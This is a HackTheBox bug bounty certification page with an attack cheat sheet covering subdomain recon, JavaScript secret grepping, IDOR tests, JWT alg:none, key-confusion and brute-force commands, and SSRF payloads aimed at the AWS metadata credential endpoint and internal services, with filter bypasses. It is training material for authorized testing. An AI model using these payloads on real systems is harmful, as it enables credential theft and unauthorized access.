HTB Certified Bug Bounty Hunter

Intermediate 7-day practical exam Pass: Passing report $210

Web vulnerability assessment for bug bounty — XSS, IDOR, SSRF, auth bypass, API hacking.

Official Page

IssuerHackTheBox

Format7-day practical exam

Duration7 days

Pass ScorePassing report

Overview Syllabus (7) Tools (7) Cheat Sheets (1) Labs (1)

Cheat Sheets

Bug Bounty Recon & Attack Reference

Bug Bounty Recon Pipeline

# Subdomain enum
subfinder -d target.com -silent | anew subs.txt
amass enum -passive -d target.com | anew subs.txt
# Certificate Transparency
curl "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u | anew subs.txt

# Probe live hosts
cat subs.txt | httpx -silent -sc -title -tech-detect -o live.txt

# Get all known URLs
cat subs.txt | gau --threads 5 | sort -u | anew urls.txt
cat subs.txt | waybackurls | sort -u | anew urls.txt

# Find interesting params/endpoints
grep -E "\?|\.php|\.asp|\.jsp" urls.txt | sort -u > params.txt

# JavaScript analysis
cat live.txt | subjs | sort -u > js_files.txt
cat js_files.txt | while read url; do curl -s $url | grep -oE '(\/api|\/v[0-9]|token|secret|key)[^"'"'"' ]+'; done

IDOR & Broken Auth Testing

# IDOR checklist
# 1. Capture authenticated request with your user ID
# 2. Change ID to another user's ID in all parameters:
#    - URL path: /api/users/1337 → /api/users/1338
#    - Query params: ?user_id=1337 → ?user_id=1338
#    - JSON body: {"id": 1337} → {"id": 1338}
#    - Headers: X-User-ID: 1337
# 3. Check indirect references (encoded IDs, hashed IDs)
#    - Base64 decode, hash lookup

# Auth bypass
# JWT alg:none
python3 jwt_tool.py  -X a
# JWT key confusion (RS256 → HS256)
python3 jwt_tool.py  -X k -pk public.pem
# Brute force JWT secret
python3 jwt_tool.py  -C -d /usr/share/wordlists/rockyou.txt

SSRF Exploitation Chain

# Basic SSRF detection
# Find parameters that fetch URLs: url=, redirect=, image=, src=, href=, path=
# Test with Burp Collaborator or interactsh

# AWS metadata (critical finding)
url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
url=http://169.254.169.254/latest/user-data

# Internal service enumeration
url=http://localhost:6379/   # Redis
url=http://localhost:5432/   # PostgreSQL
url=http://localhost:8500/   # Consul
url=http://localhost:9200/   # Elasticsearch

# Filter bypass
url=http://0/  url=http://127.1/  url=http://[::1]/
url=http://①②⑦.①/
url=dict://127.0.0.1:6379/info

For IDOR bugs, always check if the object reference is sequential. If so, write a Burp Intruder/Turbo Intruder attack to test all IDs and compare response sizes.